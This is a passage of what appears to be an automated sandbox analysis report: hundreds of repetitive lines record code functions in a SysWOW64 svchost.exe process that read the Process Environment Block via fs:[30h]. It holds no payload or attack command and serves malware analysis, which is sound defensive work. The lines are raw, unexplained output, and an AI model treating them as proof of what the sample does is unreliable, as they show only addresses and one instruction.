            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E627 mov eax, dword ptr fs:[00000030h]2_2_02D4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D66620 mov eax, dword ptr fs:[00000030h]2_2_02D66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68620 mov eax, dword ptr fs:[00000030h]2_2_02D68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3262C mov eax, dword ptr fs:[00000030h]2_2_02D3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02D3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB07C3 mov eax, dword ptr fs:[00000030h]2_2_02DB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D347FB mov eax, dword ptr fs:[00000030h]2_2_02D347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D347FB mov eax, dword ptr fs:[00000030h]2_2_02D347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D527ED mov eax, dword ptr fs:[00000030h]2_2_02D527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D527ED mov eax, dword ptr fs:[00000030h]2_2_02D527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D527ED mov eax, dword ptr fs:[00000030h]2_2_02D527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02DBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD678E mov eax, dword ptr fs:[00000030h]2_2_02DD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D307AF mov eax, dword ptr fs:[00000030h]2_2_02D307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE47A0 mov eax, dword ptr fs:[00000030h]2_2_02DE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30750 mov eax, dword ptr fs:[00000030h]2_2_02D30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBE75D mov eax, dword ptr fs:[00000030h]2_2_02DBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72750 mov eax, dword ptr fs:[00000030h]2_2_02D72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72750 mov eax, dword ptr fs:[00000030h]2_2_02D72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB4755 mov eax, dword ptr fs:[00000030h]2_2_02DB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6674D mov esi, dword ptr fs:[00000030h]2_2_02D6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6674D mov eax, dword ptr fs:[00000030h]2_2_02D6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6674D mov eax, dword ptr fs:[00000030h]2_2_02D6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38770 mov eax, dword ptr fs:[00000030h]2_2_02D38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30710 mov eax, dword ptr fs:[00000030h]2_2_02D30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D60710 mov eax, dword ptr fs:[00000030h]2_2_02D60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C700 mov eax, dword ptr fs:[00000030h]2_2_02D6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6273C mov eax, dword ptr fs:[00000030h]2_2_02D6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6273C mov ecx, dword ptr fs:[00000030h]2_2_02D6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6273C mov eax, dword ptr fs:[00000030h]2_2_02D6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAC730 mov eax, dword ptr fs:[00000030h]2_2_02DAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C720 mov eax, dword ptr fs:[00000030h]2_2_02D6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C720 mov eax, dword ptr fs:[00000030h]2_2_02D6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D304E5 mov ecx, dword ptr fs:[00000030h]2_2_02D304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEA49A mov eax, dword ptr fs:[00000030h]2_2_02DEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D644B0 mov ecx, dword ptr fs:[00000030h]2_2_02D644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02DBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D364AB mov eax, dword ptr fs:[00000030h]2_2_02D364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEA456 mov eax, dword ptr fs:[00000030h]2_2_02DEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2645D mov eax, dword ptr fs:[00000030h]2_2_02D2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5245A mov eax, dword ptr fs:[00000030h]2_2_02D5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5A470 mov eax, dword ptr fs:[00000030h]2_2_02D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5A470 mov eax, dword ptr fs:[00000030h]2_2_02D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5A470 mov eax, dword ptr fs:[00000030h]2_2_02D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBC460 mov ecx, dword ptr fs:[00000030h]2_2_02DBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68402 mov eax, dword ptr fs:[00000030h]2_2_02D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68402 mov eax, dword ptr fs:[00000030h]2_2_02D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68402 mov eax, dword ptr fs:[00000030h]2_2_02D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A430 mov eax, dword ptr fs:[00000030h]2_2_02D6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E420 mov eax, dword ptr fs:[00000030h]2_2_02D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E420 mov eax, dword ptr fs:[00000030h]2_2_02D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E420 mov eax, dword ptr fs:[00000030h]2_2_02D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C427 mov eax, dword ptr fs:[00000030h]2_2_02D2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D365D0 mov eax, dword ptr fs:[00000030h]2_2_02D365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02D6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02D6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E5CF mov eax, dword ptr fs:[00000030h]2_2_02D6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E5CF mov eax, dword ptr fs:[00000030h]2_2_02D6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D325E0 mov eax, dword ptr fs:[00000030h]2_2_02D325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C5ED mov eax, dword ptr fs:[00000030h]2_2_02D6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C5ED mov eax, dword ptr fs:[00000030h]2_2_02D6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E59C mov eax, dword ptr fs:[00000030h]2_2_02D6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D32582 mov eax, dword ptr fs:[00000030h]2_2_02D32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D32582 mov ecx, dword ptr fs:[00000030h]2_2_02D32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D64588 mov eax, dword ptr fs:[00000030h]2_2_02D64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D545B1 mov eax, dword ptr fs:[00000030h]2_2_02D545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D545B1 mov eax, dword ptr fs:[00000030h]2_2_02D545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB05A7 mov eax, dword ptr fs:[00000030h]2_2_02DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB05A7 mov eax, dword ptr fs:[00000030h]2_2_02DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB05A7 mov eax, dword ptr fs:[00000030h]2_2_02DB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38550 mov eax, dword ptr fs:[00000030h]2_2_02D38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38550 mov eax, dword ptr fs:[00000030h]2_2_02D38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6656A mov eax, dword ptr fs:[00000030h]2_2_02D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6656A mov eax, dword ptr fs:[00000030h]2_2_02D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6656A mov eax, dword ptr fs:[00000030h]2_2_02D6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC6500 mov eax, dword ptr fs:[00000030h]2_2_02DC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04500 mov eax, dword ptr fs:[00000030h]2_2_02E04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40535 mov eax, dword ptr fs:[00000030h]2_2_02D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E53E mov eax, dword ptr fs:[00000030h]2_2_02D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E53E mov eax, dword ptr fs:[00000030h]2_2_02D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E53E mov eax, dword ptr fs:[00000030h]2_2_02D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E53E mov eax, dword ptr fs:[00000030h]2_2_02D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E53E mov eax, dword ptr fs:[00000030h]2_2_02D5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30AD0 mov eax, dword ptr fs:[00000030h]2_2_02D30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D64AD0 mov eax, dword ptr fs:[00000030h]2_2_02D64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D64AD0 mov eax, dword ptr fs:[00000030h]2_2_02D64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D86ACC mov eax, dword ptr fs:[00000030h]2_2_02D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D86ACC mov eax, dword ptr fs:[00000030h]2_2_02D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D86ACC mov eax, dword ptr fs:[00000030h]2_2_02D86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6AAEE mov eax, dword ptr fs:[00000030h]2_2_02D6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6AAEE mov eax, dword ptr fs:[00000030h]2_2_02D6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68A90 mov edx, dword ptr fs:[00000030h]2_2_02D68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3EA80 mov eax, dword ptr fs:[00000030h]2_2_02D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04A80 mov eax, dword ptr fs:[00000030h]2_2_02E04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38AA0 mov eax, dword ptr fs:[00000030h]2_2_02D38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38AA0 mov eax, dword ptr fs:[00000030h]2_2_02D38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D86AA4 mov eax, dword ptr fs:[00000030h]2_2_02D86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36A50 mov eax, dword ptr fs:[00000030h]2_2_02D36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40A5B mov eax, dword ptr fs:[00000030h]2_2_02D40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40A5B mov eax, dword ptr fs:[00000030h]2_2_02D40A5B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DDEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DBCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D54A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D54A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DDEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D50BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D50BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D50BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D30BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D30BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D30BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D38BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D38BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D38BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DBCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D40BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D40BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D28B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DDEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DE4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DC6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DD8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D2CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E04B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DF8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D5E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02E008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DFA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DBC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D30887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D60854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D34859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D34859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02D42840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02DBE872 mov eax, dword ptr fs:[00000030h]
